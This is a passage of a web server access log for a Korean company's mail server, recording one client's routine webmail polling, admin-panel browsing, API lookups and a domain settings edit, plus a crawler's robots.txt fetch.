192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:38:16 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=autocomplete" [Client 222.117.41.51] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:38:47 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_unlock=loading1771141125330&_framed=1" [Client 222.117.41.51] [Length 395] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:38:48 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_refresh=1&_mbox=INBOX" [Client 222.117.41.51] [Length 11621] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:38:48 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771141129179" [Client 222.117.41.51] [Length 371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:38:48 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771141129212&_=1771141129178" [Client 222.117.41.51] [Length 3602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:39:48 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:40:48 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:41:48 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 3466] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:42:48 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:43:49 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:44:49 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:45:50 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:08 +0000] - 302 302 - GET https mail.hanmocnn.co.kr "/admin/" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:07:46:09 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/dashboard" [Client 222.117.41.51] [Length 30216] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:07:46:09 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:10 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 195] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/status/host" [Client 222.117.41.51] [Length 196] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/mailbox" [Client 222.117.41.51] [Length 35564] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/presets/sieve" [Client 222.117.41.51] [Length 1033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain/hanmocnn.co.kr" [Client 222.117.41.51] [Length 404] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain/datatables?draw=1&columns%5B0%5D%5Bdata%5D=&columns%5B0%5D%5Bname%5D=&columns%5B0%5D%5Bsearchable%5D=false&columns%5B0%5D%5Borderable%5D=false&columns%5B0%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B0%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B1%5D%5Bdata%5D=chkbox&columns%5B1%5D%5Bname%5D=&columns%5B1%5D%5Bsearchable%5D=false&columns%5B1%5D%5Borderable%5D=false&columns%5B1%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B1%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B2%5D%5Bdata%5D=domain_h_name&columns%5B2%5D%5Bname%5D=&columns%5B2%5D%5Bsearchable%5D=true&columns%5B2%5D%5Borderable%5D=true&columns%5B2%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B2%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B3%5D%5Bdata%5D=aliases&columns%5B3%5D%5Bname%5D=&columns%5B3%5D%5Bsearchable%5D=false&columns%5B3%5D%5Borderable%5D=true&columns%5B3%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B3%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B4%5D%5Bdata%5D=mailboxes&columns%5B4%5D%5Bname%5D=&columns%5B4%5D%5Bsearchable%5D=false&columns%5B4%5D%5Borderable%5D=true&columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B4%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B5%5D%5Bdata%5D=quota&columns%5B5%5D%5Bname%5D=&columns%5B5%5D%5Bsearchable%5D=false&columns%5B5%5D%5Borderable%5D=true&columns%5B5%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B5%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B6%5D%5Bdata%5D=stats&columns%5B6%5D%5Bname%5D=&columns%5B6%5D%5Bsearchable%5D=false&columns%5B6%5D%5Borderable%5D=true&columns%5B6%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B6%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B7%5D%5Bdata%5D=def_quota_for_mbox&columns%5B7%5D%5Bname%5D=&columns%5B7%5D%5Bsearchable%5D=false&columns%5B7%5D%5Borderable%5D=true&columns%5B7%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B7%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B8%5D%5Bdata%5D=max_quota_for_mbox&columns%5B8%5D%5Bname%5D=&columns%5B8%5D%5Bsearchable%5D=false&columns%5B8%5D%5Borderable%5D=true&columns%5B8%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B8%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B9%5D%5Bdata%5D=rl&columns%5B9%5D%5Bname%5D=&columns%5B9%5D%5Bsearchable%5D=false&columns%5B9%5D%5Borderable%5D=false&columns%5B9%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B9%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B10%5D%5Bdata%5D=backupmx&columns%5B10%5D%5Bname%5D=&columns%5B10%5D%5Bsearchable%5D=false&columns%5B10%5D%5Borderable%5D=true&columns%5B10%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B10%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B11%5D%5Bdata%5D=domain_admins&columns%5B11%5D%5Bname%5D=&columns%5B11%5D%5Bsearchable%5D=false&columns%5B11%5D%5Borderable%5D=false&columns%5B11%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B11%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B12%5D%5Bdata%5D=created&columns%5B12%5D%5Bname%5D=&columns%5B12%5D%5Bsearchable%5D=false&columns%5B12%5D%5Borderable%5D=false&columns%5B12%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B12%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B13%5D%5Bdata%5D=modified&columns%5B13%5D%5Bname%5D=&columns%5B13%5D%5Bsearchable%5D=false&columns%5B13%5D%5Borderable%5D=false&columns%5B13%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B13%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B14%5D%5Bdata%5D=tags&columns%5B14%5D%5Bname%5D=&columns%5B14%5D%5Bsearchable%5D=true&columns%5B14%5D%5Borderable%5D=false&columns%5B14%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B14%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B15%5D%5Bdata%5D=active&columns%5B15%5D%5Bname%5D=&columns%5B15%5D%5Bsearchable%5D=false&columns%5B15%5D%5Borderable%5D=true&columns%5B15%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B15%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B16%5D%5Bdata%5D=action&columns%5B16%5D%5Bname%5D=&columns%5B16%5D%5Bsearchable%5D=false&columns%5B16%5D%5Borderable%5D=false&columns%5B16%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B16%5D%5Bsearch%5D%5Bregex%5D=false&order%5B0%5D%5Bcolumn%5D=0&order%5B0%5D%5Bdir%5D=asc&start=0&length=25&search%5Bvalue%5D=&search%5Bregex%5D=false&_=1771141576690" [Client 222.117.41.51] [Length 463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:29 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/system" [Client 222.117.41.51] [Length 47209] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:29 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/presets/rspamd" [Client 222.117.41.51] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:29 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:29 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain-admin/all?_=1771141589915" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:29 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/admin/all?_=1771141589914" [Client 222.117.41.51] [Length 124] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:29 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/transport/all?_=1771141589916" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:29 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/relayhost/all?_=1771141589917" [Client 222.117.41.51] [Length 193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:42 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/robots.txt" [Client 74.7.244.12] [Length 26] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[15/Feb/2026:07:46:46 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/admin/mailbox" [Client 222.117.41.51] [Length 35563] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:46 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/presets/sieve" [Client 222.117.41.51] [Length 1033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:46 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain/hanmocnn.co.kr" [Client 222.117.41.51] [Length 404] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:46 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:46 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/domain/datatables?draw=1&columns%5B0%5D%5Bdata%5D=&columns%5B0%5D%5Bname%5D=&columns%5B0%5D%5Bsearchable%5D=false&columns%5B0%5D%5Borderable%5D=false&columns%5B0%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B0%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B1%5D%5Bdata%5D=chkbox&columns%5B1%5D%5Bname%5D=&columns%5B1%5D%5Bsearchable%5D=false&columns%5B1%5D%5Borderable%5D=false&columns%5B1%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B1%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B2%5D%5Bdata%5D=domain_h_name&columns%5B2%5D%5Bname%5D=&columns%5B2%5D%5Bsearchable%5D=true&columns%5B2%5D%5Borderable%5D=true&columns%5B2%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B2%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B3%5D%5Bdata%5D=aliases&columns%5B3%5D%5Bname%5D=&columns%5B3%5D%5Bsearchable%5D=false&columns%5B3%5D%5Borderable%5D=true&columns%5B3%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B3%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B4%5D%5Bdata%5D=mailboxes&columns%5B4%5D%5Bname%5D=&columns%5B4%5D%5Bsearchable%5D=false&columns%5B4%5D%5Borderable%5D=true&columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B4%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B5%5D%5Bdata%5D=quota&columns%5B5%5D%5Bname%5D=&columns%5B5%5D%5Bsearchable%5D=false&columns%5B5%5D%5Borderable%5D=true&columns%5B5%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B5%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B6%5D%5Bdata%5D=stats&columns%5B6%5D%5Bname%5D=&columns%5B6%5D%5Bsearchable%5D=false&columns%5B6%5D%5Borderable%5D=true&columns%5B6%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B6%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B7%5D%5Bdata%5D=def_quota_for_mbox&columns%5B7%5D%5Bname%5D=&columns%5B7%5D%5Bsearchable%5D=false&columns%5B7%5D%5Borderable%5D=true&columns%5B7%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B7%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B8%5D%5Bdata%5D=max_quota_for_mbox&columns%5B8%5D%5Bname%5D=&columns%5B8%5D%5Bsearchable%5D=false&columns%5B8%5D%5Borderable%5D=true&columns%5B8%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B8%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B9%5D%5Bdata%5D=rl&columns%5B9%5D%5Bname%5D=&columns%5B9%5D%5Bsearchable%5D=false&columns%5B9%5D%5Borderable%5D=false&columns%5B9%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B9%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B10%5D%5Bdata%5D=backupmx&columns%5B10%5D%5Bname%5D=&columns%5B10%5D%5Bsearchable%5D=false&columns%5B10%5D%5Borderable%5D=true&columns%5B10%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B10%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B11%5D%5Bdata%5D=domain_admins&columns%5B11%5D%5Bname%5D=&columns%5B11%5D%5Bsearchable%5D=false&columns%5B11%5D%5Borderable%5D=false&columns%5B11%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B11%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B12%5D%5Bdata%5D=created&columns%5B12%5D%5Bname%5D=&columns%5B12%5D%5Bsearchable%5D=false&columns%5B12%5D%5Borderable%5D=false&columns%5B12%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B12%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B13%5D%5Bdata%5D=modified&columns%5B13%5D%5Bname%5D=&columns%5B13%5D%5Bsearchable%5D=false&columns%5B13%5D%5Borderable%5D=false&columns%5B13%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B13%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B14%5D%5Bdata%5D=tags&columns%5B14%5D%5Bname%5D=&columns%5B14%5D%5Bsearchable%5D=true&columns%5B14%5D%5Borderable%5D=false&columns%5B14%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B14%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B15%5D%5Bdata%5D=active&columns%5B15%5D%5Bname%5D=&columns%5B15%5D%5Bsearchable%5D=false&columns%5B15%5D%5Borderable%5D=true&columns%5B15%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B15%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B16%5D%5Bdata%5D=action&columns%5B16%5D%5Bname%5D=&columns%5B16%5D%5Bsearchable%5D=false&columns%5B16%5D%5Borderable%5D=false&columns%5B16%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B16%5D%5Bsearch%5D%5Bregex%5D=false&order%5B0%5D%5Bcolumn%5D=0&order%5B0%5D%5Bdir%5D=asc&start=0&length=25&search%5Bvalue%5D=&search%5Bregex%5D=false&_=1771141606808" [Client 222.117.41.51] [Length 463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:46:55 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/alias/all?_=1771141606809" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:59:29 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/syncjobs/all/no_log?_=1771141606810" [Client 222.117.41.51] [Length 428] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:59:30 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/filters/all?_=1771141606811" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:59:31 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/bcc/all?_=1771141606812" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:59:31 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/recipient_map/all?_=1771141606813" [Client 222.117.41.51] [Length 33] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:59:31 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/bcc-destination-options" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:59:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/edit/domain/hanmocnn.co.kr" [Client 222.117.41.51] [Length 31984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:07:59:42 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:02:55 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/api/v1/edit/domain" [Client 222.117.41.51] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:02:55 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/edit/domain/hanmocnn.co.kr" [Client 222.117.41.51] [Length 32033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:02:55 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:29 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:29 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:32 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 